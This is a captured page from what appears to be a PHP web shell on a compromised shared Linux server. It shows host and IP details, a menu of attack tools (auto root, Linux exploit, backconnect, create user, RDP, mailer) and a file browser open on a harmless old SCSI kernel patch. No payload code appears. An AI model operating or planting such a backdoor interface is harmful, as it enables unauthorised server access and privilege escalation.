Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
scsitools /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGES.scsidev.gz
3.52
KB
-rw-r--r--
CHANGES.scsiinfo
2.8
KB
-rw-r--r--
README.Debian
3.09
KB
-rw-r--r--
README.scsi-spin
1.52
KB
-rw-r--r--
README.scsidev.gz
2.53
KB
-rw-r--r--
README.scsiinfo
2.13
KB
-rw-r--r--
README.sraw
2
KB
-rw-r--r--
TODO.scsiinfo
1.37
KB
-rw-r--r--
changelog.Debian.gz
1.9
KB
-rw-r--r--
changelog.gz
3.52
KB
-rw-r--r--
copyright
1.17
KB
-rw-r--r--
kernel-source-2.2.14.espfix
2.37
KB
-rw-r--r--
kpatch.sraw
2.52
KB
-rw-r--r--
scsi.alias
412
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kernel-source-2.2.14.espfix
diff -ur kernel-source-2.2.14.orig/drivers/scsi/esp.c kernel-source-2.2.14/drivers/scsi/esp.c --- kernel-source-2.2.14.orig/drivers/scsi/esp.c Tue Jan 4 19:12:20 2000 +++ kernel-source-2.2.14/drivers/scsi/esp.c Sat Mar 25 13:46:04 2000 @@ -4313,3 +4313,11 @@ spin_unlock_irqrestore(&io_request_lock, flags); } #endif + +int esp_revoke(Scsi_Device* SDptr) +{ + struct Sparc_ESP *esp = (struct Sparc_ESP *) SDptr->host->hostdata; + esp->targets_present &= ~(1 << SDptr->id); + return 0; +} + diff -ur kernel-source-2.2.14.orig/drivers/scsi/esp.h kernel-source-2.2.14/drivers/scsi/esp.h --- kernel-source-2.2.14.orig/drivers/scsi/esp.h Sun Mar 28 20:04:13 1999 +++ kernel-source-2.2.14/drivers/scsi/esp.h Sat Mar 25 01:27:17 2000 @@ -413,6 +413,7 @@ extern int esp_reset(Scsi_Cmnd *, unsigned int); extern int esp_proc_info(char *buffer, char **start, off_t offset, int length, int hostno, int inout); +extern int esp_revoke(Scsi_Device* SDptr); extern struct proc_dir_entry proc_scsi_esp; @@ -421,6 +422,7 @@ proc_info: &esp_proc_info, \ name: "Sun ESP 100/100a/200", \ detect: esp_detect, \ + revoke: esp_revoke, \ info: esp_info, \ command: esp_command, \ queuecommand: esp_queue, \ diff -ur kernel-source-2.2.14.orig/drivers/scsi/hosts.h kernel-source-2.2.14/drivers/scsi/hosts.h --- kernel-source-2.2.14.orig/drivers/scsi/hosts.h Sun Mar 28 20:04:03 1999 +++ kernel-source-2.2.14/drivers/scsi/hosts.h Sat Mar 25 01:32:37 2000 @@ -95,6 +95,7 @@ * especially that scsi_malloc/scsi_free must not be called. */ int (* detect)(struct SHT *); + int (*revoke)(Scsi_Device *); /* Used with loadable modules to unload the host structures. Note: * there is a default action built into the modules code which may diff -ur kernel-source-2.2.14.orig/drivers/scsi/scsi.c kernel-source-2.2.14/drivers/scsi/scsi.c --- kernel-source-2.2.14.orig/drivers/scsi/scsi.c Tue Jan 4 19:12:21 2000 +++ kernel-source-2.2.14/drivers/scsi/scsi.c Sat Mar 25 01:25:47 2000 @@ -2492,6 +2492,8 @@ * Nobody is using this device any more. * Free all of the command structures. */ + if (HBA_ptr->hostt->revoke) + HBA_ptr->hostt->revoke(scd); for(SCpnt=scd->device_queue; SCpnt; SCpnt = scd->device_queue) { scd->device_queue = SCpnt->next;
Close